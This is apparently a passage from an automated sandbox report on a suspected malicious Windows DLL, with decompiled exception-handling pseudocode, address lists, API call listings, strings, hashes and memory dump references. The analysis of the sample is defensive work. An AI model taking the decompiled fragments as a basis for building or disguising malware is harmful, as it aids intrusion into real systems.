																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E4BCFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E4BCA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E4BDA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E4BDA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E4BF50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E4BD6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, ?str?) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E4BCA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E4BD6C1( &_v64);
											E6E4BC29C( &_v64, 0x6e4f7f7c);
											L63:
											 *(E6E4BCCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E4BCCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E4BC65D(_t279, _t319, _t274);
											E6E4BD945(_a8, _a16, _t305);
											_t235 = E6E4BDB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E4BD8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                          0x6e4bd036
                          0x6e4bd03d
                          0x6e4bd03f
                          0x6e4bd048
                          0x6e4bd04e
                          0x6e4bd056
                          0x6e4bd058
                          0x6e4bd05b
                          0x6e4bd061
                          0x6e4bd3da
                          0x6e4bd3da
                          0x6e4bd3df
                          0x6e4bd3e1
                          0x6e4bd3e3
                          0x6e4bd3e6
                          0x6e4bd3e7
                          0x6e4bd3ea
                          0x6e4bd3f0
                          0x6e4bd50f
                          0x6e4bd3f6
                          0x6e4bd3f6
                          0x6e4bd3f7
                          0x6e4bd3f8
                          0x6e4bd3ff
                          0x6e4bd402
                          0x6e4bd405
                          0x6e4bd40b
                          0x6e4bd40d
                          0x6e4bd412
                          0x6e4bd415
                          0x6e4bd417
                          0x6e4bd41d
                          0x6e4bd41f
                          0x6e4bd425
                          0x6e4bd43a
                          0x6e4bd43f
                          0x6e4bd442
                          0x6e4bd444
                          0x6e4bd50b
                          0x00000000
                          0x6e4bd50c
                          0x6e4bd444
                          0x6e4bd425
                          0x6e4bd41d
                          0x6e4bd415
                          0x6e4bd44a
                          0x6e4bd44d
                          0x6e4bd450
                          0x6e4bd453
                          0x6e4bd456
                          0x6e4bd45c
                          0x6e4bd46e
                          0x6e4bd473
                          0x6e4bd476
                          0x6e4bd479
                          0x6e4bd47c
                          0x6e4bd47f
                          0x6e4bd482
                          0x6e4bd485
                          0x00000000
                          0x00000000
                          0x6e4bd48b
                          0x6e4bd48b
                          0x6e4bd48e
                          0x6e4bd491
                          0x6e4bd4a0
                          0x6e4bd4a1
                          0x6e4bd4a1
                          0x6e4bd4a3
                          0x6e4bd4a6
                          0x00000000
                          0x00000000
                          0x6e4bd4a8
                          0x6e4bd4ab
                          0x00000000
                          0x00000000
                          0x6e4bd4b9
                          0x6e4bd4bb
                          0x6e4bd4be
                          0x6e4bd4c0
                          0x6e4bd4c8
                          0x6e4bd4c8
                          0x6e4bd4cb
                          0x6e4bd4cd
                          0x6e4bd4cf
                          0x6e4bd4eb
                          0x6e4bd4f0
                          0x6e4bd4f3
                          0x6e4bd4f3
                          0x00000000
                          0x6e4bd4cb
                          0x6e4bd4c2
                          0x6e4bd4c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd4f6
                          0x6e4bd4f9
                          0x6e4bd4fa
                          0x6e4bd4fd
                          0x6e4bd500
                          0x6e4bd503
                          0x6e4bd506
                          0x6e4bd506
                          0x00000000
                          0x6e4bd491
                          0x6e4bd510
                          0x6e4bd515
                          0x6e4bd516
                          0x6e4bd519
                          0x6e4bd51c
                          0x6e4bd51d
                          0x6e4bd51e
                          0x6e4bd51f
                          0x6e4bd522
                          0x6e4bd524
                          0x6e4bd59c
                          0x6e4bd59e
                          0x6e4bd59e
                          0x6e4bd526
                          0x6e4bd526
                          0x6e4bd529
                          0x6e4bd52c
                          0x00000000
                          0x6e4bd52e
                          0x6e4bd52e
                          0x6e4bd531
                          0x6e4bd534
                          0x6e4bd53b
                          0x6e4bd53b
                          0x6e4bd53e
                          0x6e4bd540
                          0x6e4bd542
                          0x6e4bd574
                          0x6e4bd574
                          0x6e4bd577
                          0x6e4bd57e
                          0x6e4bd57e
                          0x6e4bd581
                          0x6e4bd584
                          0x6e4bd58b
                          0x6e4bd58b
                          0x6e4bd58e
                          0x6e4bd595
                          0x6e4bd597
                          0x6e4bd597
                          0x6e4bd590
                          0x6e4bd590
                          0x6e4bd593
                          0x00000000
                          0x00000000
                          0x6e4bd593
                          0x6e4bd586
                          0x6e4bd586
                          0x6e4bd589
                          0x00000000
                          0x00000000
                          0x6e4bd589
                          0x6e4bd579
                          0x6e4bd579
                          0x6e4bd57c
                          0x00000000
                          0x00000000
                          0x6e4bd57c
                          0x6e4bd598
                          0x6e4bd544
                          0x6e4bd544
                          0x6e4bd544
                          0x6e4bd547
                          0x6e4bd547
                          0x6e4bd549
                          0x6e4bd54b
                          0x00000000
                          0x00000000
                          0x6e4bd54d
                          0x6e4bd54f
                          0x6e4bd563
                          0x6e4bd563
                          0x6e4bd551
                          0x6e4bd551
                          0x6e4bd554
                          0x6e4bd557
                          0x00000000
                          0x6e4bd559
                          0x6e4bd559
                          0x6e4bd55c
                          0x6e4bd55f
                          0x6e4bd561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd561
                          0x6e4bd557
                          0x6e4bd56c
                          0x6e4bd56c
                          0x6e4bd56e
                          0x00000000
                          0x6e4bd570
                          0x6e4bd570
                          0x6e4bd570
                          0x00000000
                          0x6e4bd56e
                          0x6e4bd567
                          0x6e4bd569
                          0x6e4bd569
                          0x00000000
                          0x6e4bd569
                          0x6e4bd536
                          0x6e4bd536
                          0x6e4bd539
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd539
                          0x6e4bd534
                          0x6e4bd52c
                          0x6e4bd59f
                          0x6e4bd5a3
                          0x6e4bd5a3
                          0x6e4bd070
                          0x6e4bd070
                          0x6e4bd079
                          0x6e4bd176
                          0x6e4bd176
                          0x6e4bd179
                          0x00000000
                          0x6e4bd0a8
                          0x6e4bd0a8
                          0x6e4bd0ad
                          0x00000000
                          0x6e4bd0b3
                          0x6e4bd0b3
                          0x6e4bd0bb
                          0x6e4bd374
                          0x6e4bd378
                          0x6e4bd0c1
                          0x6e4bd0c6
                          0x6e4bd0c9
                          0x6e4bd0ce
                          0x6e4bd0d5
                          0x6e4bd0da
                          0x00000000
                          0x6e4bd112
                          0x6e4bd11a
                          0x6e4bd17e
                          0x6e4bd17e
                          0x6e4bd181
                          0x6e4bd184
                          0x6e4bd186
                          0x6e4bd189
                          0x6e4bd18c
                          0x6e4bd192
                          0x6e4bd343
                          0x6e4bd343
                          0x6e4bd346
                          0x00000000
                          0x6e4bd348
                          0x6e4bd348
                          0x6e4bd34b
                          0x00000000
                          0x6e4bd351
                          0x6e4bd351
                          0x6e4bd354
                          0x6e4bd357
                          0x6e4bd358
                          0x6e4bd359
                          0x6e4bd35c
                          0x6e4bd35d
                          0x6e4bd360
                          0x6e4bd361
                          0x6e4bd366
                          0x00000000
                          0x6e4bd366
                          0x6e4bd34b
                          0x6e4bd198
                          0x6e4bd198
                          0x6e4bd19c
                          0x00000000
                          0x6e4bd1a2
                          0x6e4bd1a2
                          0x6e4bd1a9
                          0x6e4bd1c1
                          0x6e4bd1c1
                          0x6e4bd1c4
                          0x6e4bd1c7
                          0x6e4bd1cd
                          0x6e4bd1dd
                          0x6e4bd1e2
                          0x6e4bd1e5
                          0x6e4bd1e8
                          0x6e4bd1eb
                          0x6e4bd1ee
                          0x6e4bd1f1
                          0x6e4bd1f4
                          0x6e4bd1fa
                          0x6e4bd1fa
                          0x6e4bd1fd
                          0x6e4bd200
                          0x6e4bd20f
                          0x6e4bd210
                          0x6e4bd210
                          0x6e4bd212
                          0x6e4bd215
                          0x6e4bd21b
                          0x6e4bd21e
                          0x6e4bd224
                          0x6e4bd226
                          0x6e4bd229
                          0x6e4bd22c
                          0x6e4bd235
                          0x6e4bd238
                          0x6e4bd23a
                          0x6e4bd23a
                          0x6e4bd23d
                          0x6e4bd240
                          0x6e4bd243
                          0x6e4bd246
                          0x6e4bd249
                          0x6e4bd24e
                          0x6e4bd24f
                          0x6e4bd250
                          0x6e4bd251
                          0x6e4bd252
                          0x6e4bd255
                          0x6e4bd257
                          0x6e4bd259
                          0x00000000
                          0x6e4bd25b
                          0x6e4bd25b
                          0x6e4bd25b
                          0x6e4bd25e
                          0x6e4bd261
                          0x6e4bd263
                          0x6e4bd264
                          0x6e4bd269
                          0x6e4bd26c
                          0x6e4bd26e
                          0x00000000
                          0x00000000
                          0x6e4bd270
                          0x6e4bd271
                          0x6e4bd274
                          0x6e4bd276
                          0x00000000
                          0x6e4bd278
                          0x6e4bd278
                          0x6e4bd27b
                          0x6e4bd27e
                          0x00000000
                          0x6e4bd27e
                          0x00000000
                          0x6e4bd276
                          0x6e4bd292
                          0x6e4bd298
                          0x6e4bd2b5
                          0x6e4bd2ba
                          0x6e4bd2ba
                          0x6e4bd2bd
                          0x6e4bd2bd
                          0x00000000
                          0x6e4bd281
                          0x6e4bd281
                          0x6e4bd282
                          0x6e4bd285
                          0x6e4bd288
                          0x6e4bd28b
                          0x6e4bd28b
                          0x00000000
                          0x6e4bd290
                          0x6e4bd22c
                          0x6e4bd21e
                          0x6e4bd2c0
                          0x6e4bd2c3
                          0x6e4bd2c4
                          0x6e4bd2c7
                          0x6e4bd2ca
                          0x6e4bd2cd
                          0x6e4bd2d0
                          0x6e4bd2d0
                          0x6e4bd2d9
                          0x6e4bd2dc
                          0x6e4bd2dc
                          0x6e4bd1f4
                          0x6e4bd2df
                          0x6e4bd2e3
                          0x6e4bd2e5
                          0x6e4bd2e8
                          0x6e4bd2ee
                          0x6e4bd2ee
                          0x6e4bd2f6
                          0x6e4bd2fb
                          0x6e4bd369
                          0x6e4bd369
                          0x6e4bd36e
                          0x6e4bd372
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd2fd
                          0x6e4bd2fd
                          0x6e4bd301
                          0x6e4bd313
                          0x6e4bd316
                          0x6e4bd319
                          0x6e4bd31b
                          0x6e4bd332
                          0x6e4bd336
                          0x6e4bd33c
                          0x6e4bd33d
                          0x6e4bd33f
                          0x00000000
                          0x6e4bd341
                          0x00000000
                          0x6e4bd341
                          0x6e4bd31d
                          0x6e4bd322
                          0x6e4bd325
                          0x6e4bd32a
                          0x6e4bd32d
                          0x00000000
                          0x6e4bd32d
                          0x6e4bd303
                          0x6e4bd306
                          0x6e4bd309
                          0x6e4bd30b
                          0x00000000
                          0x6e4bd30d
                          0x6e4bd30d
                          0x6e4bd311
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd311
                          0x6e4bd30b
                          0x6e4bd301
                          0x6e4bd1ab
                          0x6e4bd1ab
                          0x6e4bd1b2
                          0x00000000
                          0x6e4bd1b4
                          0x6e4bd1b4
                          0x6e4bd1bb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4bd1bb
                          0x6e4bd1b2
                          0x6e4bd1a9
                          0x6e4bd19c
                          0x6e4bd11c
                          0x6e4bd124
                          0x6e4bd127
                          0x6e4bd12c
                          0x6e4bd130
                          0x6e4bd133
                          0x6e4bd139
                          0x6e4bd13c
                          0x00000000
                          0x6e4bd13e
                          0x6e4bd13e
                          0x6e4bd141
                          0x6e4bd143
                          0x6e4bd379
                          0x6e4bd379
                          0x00000000
                          0x6e4bd149
                          0x6e4bd151
                          0x6e4bd15c
                          0x00000000
                          0x00000000
                          0x6e4bd165
                          0x6e4bd168
                          0x6e4bd169
                          0x6e4bd16c
                          0x6e4bd16e
                          0x00000000
                          0x6e4bd174
                          0x00000000
                          0x6e4bd174
                          0x00000000
                          0x6e4bd16e
                          0x6e4bd149
                          0x6e4bd37e
                          0x6e4bd37e
                          0x6e4bd380
                          0x6e4bd381
                          0x6e4bd388
                          0x6e4bd38b
                          0x6e4bd399
                          0x6e4bd39e
                          0x6e4bd3a3
                          0x6e4bd3a6
                          0x6e4bd3ab
                          0x6e4bd3ae
                          0x6e4bd3b1
                          0x6e4bd3b3
                          0x6e4bd3b5
                          0x6e4bd3b5
                          0x6e4bd3ba
                          0x6e4bd3c6
                          0x6e4bd3cc
                          0x6e4bd3d1
                          0x6e4bd3d4
                          0x6e4bd3d5
                          0x00000000
                          0x6e4bd3d5
                          0x6e4bd13c
                          0x6e4bd11a
                          0x6e4bd0da
                          0x6e4bd0bb
                          0x6e4bd0ad
                          0x6e4bd079

                          APIs
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6E4BD133
                          • type_info::operator==.LIBVCRUNTIME ref: 6E4BD155
                          • ___TypeMatch.LIBVCRUNTIME ref: 6E4BD264
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6E4BD336
                          • _UnwindNestedFrames.LIBCMT ref: 6E4BD3BA
                          • CallUnexpected.LIBVCRUNTIME ref: 6E4BD3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm$|$On
                          • API String ID: 2123188842-1546059785
                          • Opcode ID: 364e99d642002bfade99b74f44e4de7a1db18105be8fdfaa7c1b70d2d3fa0032
                          • Instruction ID: ec4c43ba91414f639e6886ddef39982bbf64f0a56fdd831787b7560530056465
                          • Opcode Fuzzy Hash: 364e99d642002bfade99b74f44e4de7a1db18105be8fdfaa7c1b70d2d3fa0032
                          • Instruction Fuzzy Hash: 9FB1347180020AEFCF09CFF4C990D9EBBB9AF48314B1445ABE8156B216D331EA51CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC500, Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC53A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC547
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC58A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC597
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC5CA
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC5D7
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC60A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC617
                          • TlsGetValue.KERNEL32(?), ref: 6E4AC64B
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6E4AC658
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 95572e1bf1c9febfe903a0c6cb7f6a44bb7ef9c96e08f2b5a764f9a7a7ec703b
                          • Instruction ID: c5f6765deb863d9ebbd237920208401f088f0f5741aed84826d83ee5d60653ab
                          • Opcode Fuzzy Hash: 95572e1bf1c9febfe903a0c6cb7f6a44bb7ef9c96e08f2b5a764f9a7a7ec703b
                          • Instruction Fuzzy Hash: B741B172544259EFDB80BFF9AC14F9A3764AFA2661F045022FF144F204E7A1DA21E791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B1DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6E4B1C2E,?), ref: 6E4B1DB5
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6E4B1C2E,?), ref: 6E4B1DC6
                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6E4B1E08
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6E4B1E83
                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 6E4B1F05
                          Strings
                          • assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6E4B200E
                          • Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6E4B1FF5
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast$ConsoleFileHandleModeWrite
                          • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
                          • API String ID: 4172320683-607870617
                          • Opcode ID: 00060d47c4168ebe440fddd47cd6ae22d89b537d6eccc557ac989d4debe8ba18
                          • Instruction ID: 51eacc7cd2949db9ebc35b4a1696d01eacb128658c21544cd20338a0c89b0cdb
                          • Opcode Fuzzy Hash: 00060d47c4168ebe440fddd47cd6ae22d89b537d6eccc557ac989d4debe8ba18
                          • Instruction Fuzzy Hash: B371C0706083459FD7108FB9C494B6B7BE9AB86349F10882EE4D68B380D771E94DCB63
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6E4FADA8), ref: 6E4AC6C9
                          • ReleaseSRWLockExclusive.KERNEL32(6E4FADA8), ref: 6E4AC713
                          • GetProcessHeap.KERNEL32 ref: 6E4AC722
                          • HeapAlloc.KERNEL32(005B0000,00000000,00000020), ref: 6E4AC735
                          • ReleaseSRWLockExclusive.KERNEL32(6E4FADA8), ref: 6E4AC787
                          Strings
                          • called `Option::unwrap()` on a `None` value, xrefs: 6E4AC7B7
                          • failed to generate unique thread ID: bitspace exhausted, xrefs: 6E4AC794
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                          • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                          • API String ID: 1780889587-1657987152
                          • Opcode ID: cdbca23a8194403761f5ab5f9484a72302f8e76e15f22c2bca05474f59dd7df7
                          • Instruction ID: f3cb1d12278117d4aeeb3c2fdbd406c15bbcd56eb1f4348570389ac269d4da80
                          • Opcode Fuzzy Hash: cdbca23a8194403761f5ab5f9484a72302f8e76e15f22c2bca05474f59dd7df7
                          • Instruction Fuzzy Hash: ED3122B5D002058FDB44DFF8E804FAEBBB5EFD9B24F10412AD914AB384D375A8058BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A10A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32 ref: 6E4A10D6
                          • HeapAlloc.KERNEL32(005B0000,00000000,0000000F), ref: 6E4A10ED
                          • GetProcessHeap.KERNEL32(005B0000,00000000,0000000F), ref: 6E4A111F
                          • HeapAlloc.KERNEL32(005B0000,00000000,00000010,005B0000,00000000,0000000F), ref: 6E4A1136
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,005B0000,00000000,0000000F), ref: 6E4A120B
                          • HeapFree.KERNEL32(00000000,?,00000000,00000010,005B0000,00000000,0000000F), ref: 6E4A121B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocFreeProcess
                          • String ID: Control_RunDLL$Control_RunDLL
                          • API String ID: 2113670309-2490747307
                          • Opcode ID: 070e31e65841ec72475025e8cd25483a9f9dafe6699cfaef276c4bcc595a0058
                          • Instruction ID: ef0c32cf5c86ed64a43711c44529d72386d11b400f5d52a976f7a71a27388c08
                          • Opcode Fuzzy Hash: 070e31e65841ec72475025e8cd25483a9f9dafe6699cfaef276c4bcc595a0058
                          • Instruction Fuzzy Hash: 02519FB5D006099BDB00DFF8D840FEEB7B6FF99754F10852AE905AB345D771A8048BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BC860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6E4BC897
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E4BC89F
                          • _ValidateLocalCookies.LIBCMT ref: 6E4BC928
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E4BC953
                          • _ValidateLocalCookies.LIBCMT ref: 6E4BC9A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: e3c004907eeb2d78482493feb4a461d697e8e003f4e4a72a71e7d1294e34a3a7
                          • Instruction ID: ee3acf6209284e8c167116e87ab319f7f2113088b2a87017deb5f656e5a6edb3
                          • Opcode Fuzzy Hash: e3c004907eeb2d78482493feb4a461d697e8e003f4e4a72a71e7d1294e34a3a7
                          • Instruction Fuzzy Hash: 6F417134E002099FDF00DFB9C894E9EBBB9AF45328F1085AAE8145F351D7719915CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B2B10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6E4FADB4), ref: 6E4B2B44
                          • TlsAlloc.KERNEL32 ref: 6E4B2B5A
